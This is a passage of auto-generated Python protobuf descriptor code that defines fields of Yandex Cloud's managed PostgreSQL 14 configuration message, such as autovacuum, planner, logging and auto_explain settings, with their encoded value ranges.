name='array_nulls', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.array_nulls', index=58,
number=59, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='backslash_quote', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.backslash_quote', index=59,
number=60, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='default_with_oids', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.default_with_oids', index=60,
number=61, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='escape_string_warning', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.escape_string_warning', index=61,
number=62, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lo_compat_privileges', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.lo_compat_privileges', index=62,
number=63, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='quote_all_identifiers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.quote_all_identifiers', index=63,
number=65, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='standard_conforming_strings', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.standard_conforming_strings', index=64,
number=66, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='synchronize_seqscans', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.synchronize_seqscans', index=65,
number=67, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='transform_null_equals', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.transform_null_equals', index=66,
number=68, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='exit_on_error', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.exit_on_error', index=67,
number=69, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='seq_page_cost', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.seq_page_cost', index=68,
number=70, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='random_page_cost', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.random_page_cost', index=69,
number=71, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='autovacuum_max_workers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.autovacuum_max_workers', index=70,
number=72, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0041-32', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='autovacuum_vacuum_cost_delay', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.autovacuum_vacuum_cost_delay', index=71,
number=73, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\006-1-100', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='autovacuum_vacuum_cost_limit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.autovacuum_vacuum_cost_limit', index=72,
number=74, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\010-1-10000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='autovacuum_naptime', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.autovacuum_naptime', index=73,
number=75, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\r1000-86400000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='archive_timeout', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.archive_timeout', index=74,
number=76, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\01610000-86400000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='track_activity_query_size', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.track_activity_query_size', index=75,
number=77, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\n100-102400', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_bitmapscan', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_bitmapscan', index=76,
number=80, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_hashagg', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_hashagg', index=77,
number=81, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_hashjoin', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_hashjoin', index=78,
number=82, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_indexscan', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_indexscan', index=79,
number=83, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_indexonlyscan', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_indexonlyscan', index=80,
number=84, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_material', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_material', index=81,
number=85, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_mergejoin', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_mergejoin', index=82,
number=86, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_nestloop', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_nestloop', index=83,
number=87, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_seqscan', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_seqscan', index=84,
number=88, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_sort', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_sort', index=85,
number=89, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_tidscan', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_tidscan', index=86,
number=90, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_worker_processes', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_worker_processes', index=87,
number=91, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-1024', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_parallel_workers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_parallel_workers', index=88,
number=92, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-1024', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_parallel_workers_per_gather', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_parallel_workers_per_gather', index=89,
number=93, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-1024', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='autovacuum_vacuum_scale_factor', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.autovacuum_vacuum_scale_factor', index=90,
number=94, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0070.0-1.0', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='autovacuum_analyze_scale_factor', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.autovacuum_analyze_scale_factor', index=91,
number=95, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0070.0-1.0', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='default_transaction_read_only', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.default_transaction_read_only', index=92,
number=96, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='timezone', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.timezone', index=93,
number=97, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_parallel_append', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_parallel_append', index=94,
number=98, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_parallel_hash', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_parallel_hash', index=95,
number=99, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_partition_pruning', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_partition_pruning', index=96,
number=100, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_partitionwise_aggregate', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_partitionwise_aggregate', index=97,
number=101, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_partitionwise_join', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_partitionwise_join', index=98,
number=102, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='jit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.jit', index=99,
number=103, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_parallel_maintenance_workers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_parallel_maintenance_workers', index=100,
number=104, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\003>=0', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='parallel_leader_participation', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.parallel_leader_participation', index=101,
number=105, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_transaction_sample_rate', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_transaction_sample_rate', index=102,
number=107, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0070.0-1.0', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='plan_cache_mode', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.plan_cache_mode', index=103,
number=108, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_io_concurrency', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.effective_io_concurrency', index=104,
number=109, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-1000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_cache_size', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.effective_cache_size', index=105,
number=110, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0160-549755813888', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='shared_preload_libraries', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.shared_preload_libraries', index=106,
number=111, type=14, cpp_type=8, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='auto_explain_log_min_duration', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.auto_explain_log_min_duration', index=107,
number=112, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\r-1-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='auto_explain_log_analyze', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.auto_explain_log_analyze', index=108,
number=113, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='auto_explain_log_buffers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.auto_explain_log_buffers', index=109,
number=114, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='auto_explain_log_timing', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.auto_explain_log_timing', index=110,
number=115, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='auto_explain_log_triggers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.auto_explain_log_triggers', index=111,
number=116, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='auto_explain_log_verbose', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.auto_explain_log_verbose', index=112,
number=117, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='auto_explain_log_nested_statements', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.auto_explain_log_nested_statements', index=113,
number=118, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='auto_explain_sample_rate', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.auto_explain_sample_rate', index=114,
number=119, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0070.0-1.0', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pg_hint_plan_enable_hint', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.pg_hint_plan_enable_hint', index=115,
number=120, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pg_hint_plan_enable_hint_table', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.pg_hint_plan_enable_hint_table', index=116,
number=121, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pg_hint_plan_debug_print', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.pg_hint_plan_debug_print', index=117,
number=122, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pg_hint_plan_message_level', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.pg_hint_plan_message_level', index=118,
number=123, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='hash_mem_multiplier', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.hash_mem_multiplier', index=119,
number=124, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\n0.0-1000.0', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='logical_decoding_work_mem', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.logical_decoding_work_mem', index=120,
number=126, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\02365536-1099511627776', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='maintenance_io_concurrency', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.maintenance_io_concurrency', index=121,
number=127, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-1000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_slot_wal_keep_size', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_slot_wal_keep_size', index=122,
number=128, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\023-1-2251799812636672', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='wal_keep_size', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.wal_keep_size', index=123,
number=129, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\023-1-2251799812636672', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_incremental_sort', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_incremental_sort', index=124,
number=130, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='autovacuum_vacuum_insert_threshold', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.autovacuum_vacuum_insert_threshold', index=125,
number=131, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\r-1-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='autovacuum_vacuum_insert_scale_factor', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.autovacuum_vacuum_insert_scale_factor', index=126,
number=132, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\t0.0-100.0', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_min_duration_sample', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_min_duration_sample', index=127,
number=133, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\r-1-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_statement_sample_rate', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_statement_sample_rate', index=128,
number=134, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0070.0-1.0', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_parameter_max_length', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_parameter_max_length', index=129,
number=135, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\r-1-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_parameter_max_length_on_error', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_parameter_max_length_on_error', index=130,
number=136, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\r-1-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='client_connection_check_interval', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.client_connection_check_interval', index=131,
number=137, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\r-1-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_async_append', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_async_append', index=132,
number=138, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_gathermerge', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_gathermerge', index=133,
number=139, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
